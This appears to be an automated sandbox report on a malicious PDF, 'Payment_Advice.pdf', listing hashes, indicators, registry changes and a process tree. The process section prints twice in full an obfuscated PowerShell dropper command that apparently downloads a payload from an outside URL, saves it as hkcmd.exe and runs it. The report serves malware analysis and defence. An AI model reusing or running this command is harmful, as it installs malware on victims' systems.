Analysis
-
max time kernel
130s -
max time network
152s -
platform
windows7_x64 -
resource
win7 -
submitted
08/07/2020, 00:38
Static task
static1
Behavioral task
behavioral1
Sample
Payment_Advice.pdf
Resource
win7
0 signatures
0 seconds
General
-
Target
Payment_Advice.pdf
-
Size
46KB
-
MD5
e17ca62850d31c5e98ec7707c614835e
-
SHA1
b40a216b90aa90dd0216be6c7e213543baa867ad
-
SHA256
3011e796c6bc963f1252a94961fcbea0666245b8fc62dc4f0cbc5c6e8286557a
-
SHA512
5d0623df19419fed3a0dc3e12eb92c6f0048606b25a8154bafec40dcb8a3399d0fdd19fd0b308065fdd7991f18fe0971ec8b1b911b222c93db1d229abb5ba0a8
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://gg.gg/k50sp
Signatures
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1072 AcroRd32.exe -
Checks whether UAC is enabled 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001b0829a874ca164698fa08cb019bbab8000000000200000000001066000000010000200000004d49fe6f128eb4c56a6bd9b86ef6a95b092d99353927b1676b36cd0f8681063f000000000e8000000002000020000000a7fc124b89b7c6e8b8283c44b43606072e6bfa85ba1f9f2a0469166f1faad47120000000f9ae4f7e0f27012b0a443b285da256b625a255ca345f24f6427a76b4135b121040000000f6009a2861e2ae15bc8bf43bc901e41837e510fb52df0d6d91bd88d756459e6d6b587c2154dfac8027bf2f944cf27e4da288365af040b120ecda7d1e56fee0e3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50bff445c054d601 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001b0829a874ca164698fa08cb019bbab8000000000200000000001066000000010000200000002e045484fd16ecbca4bb2251019a0e7dfe86917ffb9cb6a9ba3e185ddb9c7b44000000000e8000000002000020000000f0571a1db3a331d1f66f7541157712378b8396fd417eb9b1f72a53fb35ebfbb190000000dbfc795d8528da729a025d779885ea18997ec1eee87c532334f745172be0f4a0beb8b2b373844ab6655d5293fb8ee709cdcb87564ebc659c115e1694d5c7629fa9dd684cc20f8212abde1831506a3351f2a6abd46c07c8f50175aa3ef4dd2262ce8c3c7eb185aa11a72d45013e9643747df083d495ecf90ed1ab3277e0546c3abbc2ac4be02db942c8e7ed505028c6dd40000000c2d3ad183a1f9d34fef7ba0500deca6e95c8d28236dec11034d35cd9d6d975a878809ee50838d40c29cb8cd601874771636e421b316169825aad1d9fa27c9280 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6EEEB4B1-C0B3-11EA-8E77-CE7BA4EBFB24} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "300933723" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 1072 AcroRd32.exe 1072 AcroRd32.exe 1072 AcroRd32.exe 1312 iexplore.exe 1312 iexplore.exe 748 IEXPLORE.EXE 748 IEXPLORE.EXE 748 IEXPLORE.EXE 748 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1072 wrote to memory of 1312 1072 AcroRd32.exe 24 PID 1072 wrote to memory of 1312 1072 AcroRd32.exe 24 PID 1072 wrote to memory of 1312 1072 AcroRd32.exe 24 PID 1072 wrote to memory of 1312 1072 AcroRd32.exe 24 PID 1312 wrote to memory of 748 1312 iexplore.exe 26 PID 1312 wrote to memory of 748 1312 iexplore.exe 26 PID 1312 wrote to memory of 748 1312 iexplore.exe 26 PID 1312 wrote to memory of 748 1312 iexplore.exe 26 PID 748 wrote to memory of 1784 748 IEXPLORE.EXE 28 PID 748 wrote to memory of 1784 748 IEXPLORE.EXE 28 PID 748 wrote to memory of 1784 748 IEXPLORE.EXE 28 PID 748 wrote to memory of 1784 748 IEXPLORE.EXE 28 PID 1784 wrote to memory of 1588 1784 pOwERShEll.Exe 30 PID 1784 wrote to memory of 1588 1784 pOwERShEll.Exe 30 PID 1784 wrote to memory of 1588 1784 pOwERShEll.Exe 30 PID 1784 wrote to memory of 1588 1784 pOwERShEll.Exe 30 -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1312 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1784 pOwERShEll.Exe Token: SeDebugPrivilege 1588 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1784 pOwERShEll.Exe 1784 pOwERShEll.Exe 1588 powershell.exe 1588 powershell.exe
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Advice.pdf"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://75.127.1.203/invoice_pdf_k50sp.html2⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
PID:1312 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1312 CREDAT:275457 /prefetch:23⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\windOWspoWErShElL\v1.0\pOwERShEll.Exe"C:\Windows\syStEM32\windOWspoWErShElL\v1.0\pOwERShEll.Exe" pOWERShELl.EXE -eX bypasS -NoP -w 1 -Ec CQAJAAkAUwBlAHQALQBDAG8ATgB0AEUAbgBUAAkACQAJAC0AdgBBACAACQAJACgAIAAJAAkALgAoAEcARQB0AC0AQwBvAG0AbQBBAG4ARAAgAE4AZQBXAC0AbwBCACoAKQAgAAkACQAoAAkACQAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAwAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQByAF0ACQAgAAkAMQAwADEACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA4ADQACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAFIAXQAJACAACQA4ADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA2ADkACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQA5ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABhAHIAXQAJACAACQA5ADkACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABhAFIAXQAJACAACQAxADAAOAAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADcAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAUgBdAAkAIAAJADYAOQAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAUgBdAAkAIAAJADcAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADEAMQA2AAkAIAAJAAkACQAJACkAKQAuACgACQAJACAAWwBDAGgAYQBSAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABhAFIAXQAgAAkAIAA3ADkAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAHIAXQAgAAkAIAAxADEAOQAgAAkAIAAgAAkAIAArACAACQAgAFsAYwBIAEEAcgBdACAACQAgADEAMQAwACAACQAgACAACQAgACsAIAAJACAAWwBjAEgAYQByAF0AIAAJACAANwA2ACAACQAgACAACQAgACsAIAAJACAAWwBDAEgAYQBSAF0AIAAJACAANwA5ACAACQAgACAACQAgACsAIAAJACAAWwBDAGgAQQByAF0AIAAJACAAOQA3ACAACQAgACAACQAgACsAIAAJACAAWwBjAGgAYQByAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAHIAXQAgAAkAIAA2ADgAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAFIAXQAgAAkAIAA5ADcAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAFIAXQAgAAkAIAA4ADQAIAAJACAAIAAJACAAKwAgAAkAIABbAGMAaABBAFIAXQAgAAkAIAA2ADUAIAAJACAACQAgAAkAKQAuAEkAbgBWAG8ASwBlACgACQAJAAkAKABbAGMAaABhAHIAXQAJACAACQAxADAANAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADEAMQA2AAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAYQBSAF0ACQAgAAkAMQAxADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQAxADEAMgAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADUAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAcgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQByAF0ACQAgAAkAMQAwADMACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABBAFIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQAxADAAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAEEAUgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQBSAF0ACQAgAAkANAA3AAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQBSAF0ACQAgAAkAMQAwADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA1ADMACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQA0ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAHIAXQAJACAACQAxADEANQAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAyAAkAIAAJACkAIAAgAAkAKQAJACAAIAAtAGUAbgAgACAAIAAoAAkAIAAgAFsAQwBoAGEAcgBdACAAIAAJADYANgAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADEAMgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQBSAF0AIAAgAAkAMQAxADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAHIAXQAgACAACQA2ADkAIAAgAAkAIAAgAAkAKQAgAAkACQAtAHAAYQBUAEgAIAAgACAAHSAkAEUATgBWADoAQQBwAHAAZABBAHQAQQBcAGgAawBjAG0AZAAuAGUAeABlAB0gCQAJACAAOwAgACAACQBTAFQAQQByAHQACQAgACAAHSAkAEUAbgB2ADoAYQBwAHAAZABhAFQAYQBcAGgAawBjAG0AZAAuAGUAeABlAB0g4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypasS -NoP -w 1 -Ec CQAJAAkAUwBlAHQALQBDAG8ATgB0AEUAbgBUAAkACQAJAC0AdgBBACAACQAJACgAIAAJAAkALgAoAEcARQB0AC0AQwBvAG0AbQBBAG4ARAAgAE4AZQBXAC0AbwBCACoAKQAgAAkACQAoAAkACQAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAwAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQByAF0ACQAgAAkAMQAwADEACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA4ADQACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAFIAXQAJACAACQA4ADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA2ADkACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQA5ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABhAHIAXQAJACAACQA5ADkACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABhAFIAXQAJACAACQAxADAAOAAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADcAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAUgBdAAkAIAAJADYAOQAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAUgBdAAkAIAAJADcAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADEAMQA2AAkAIAAJAAkACQAJACkAKQAuACgACQAJACAAWwBDAGgAYQBSAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABhAFIAXQAgAAkAIAA3ADkAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAHIAXQAgAAkAIAAxADEAOQAgAAkAIAAgAAkAIAArACAACQAgAFsAYwBIAEEAcgBdACAACQAgADEAMQAwACAACQAgACAACQAgACsAIAAJACAAWwBjAEgAYQByAF0AIAAJACAANwA2ACAACQAgACAACQAgACsAIAAJACAAWwBDAEgAYQBSAF0AIAAJACAANwA5ACAACQAgACAACQAgACsAIAAJACAAWwBDAGgAQQByAF0AIAAJACAAOQA3ACAACQAgACAACQAgACsAIAAJACAAWwBjAGgAYQByAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAHIAXQAgAAkAIAA2ADgAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAFIAXQAgAAkAIAA5ADcAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAFIAXQAgAAkAIAA4ADQAIAAJACAAIAAJACAAKwAgAAkAIABbAGMAaABBAFIAXQAgAAkAIAA2ADUAIAAJACAACQAgAAkAKQAuAEkAbgBWAG8ASwBlACgACQAJAAkAKABbAGMAaABhAHIAXQAJACAACQAxADAANAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADEAMQA2AAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAYQBSAF0ACQAgAAkAMQAxADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQAxADEAMgAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADUAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAcgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQByAF0ACQAgAAkAMQAwADMACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABBAFIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQAxADAAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAEEAUgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQBSAF0ACQAgAAkANAA3AAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQBSAF0ACQAgAAkAMQAwADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA1ADMACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQA0ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAHIAXQAJACAACQAxADEANQAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAyAAkAIAAJACkAIAAgAAkAKQAJACAAIAAtAGUAbgAgACAAIAAoAAkAIAAgAFsAQwBoAGEAcgBdACAAIAAJADYANgAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADEAMgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQBSAF0AIAAgAAkAMQAxADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAHIAXQAgACAACQA2ADkAIAAgAAkAIAAgAAkAKQAgAAkACQAtAHAAYQBUAEgAIAAgACAAHSAkAEUATgBWADoAQQBwAHAAZABBAHQAQQBcAGgAawBjAG0AZAAuAGUAeABlAB0gCQAJACAAOwAgACAACQBTAFQAQQByAHQACQAgACAAHSAkAEUAbgB2ADoAYQBwAHAAZABhAFQAYQBcAGgAawBjAG0AZAAuAGUAeABlAB0g5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1588
-
-
-
-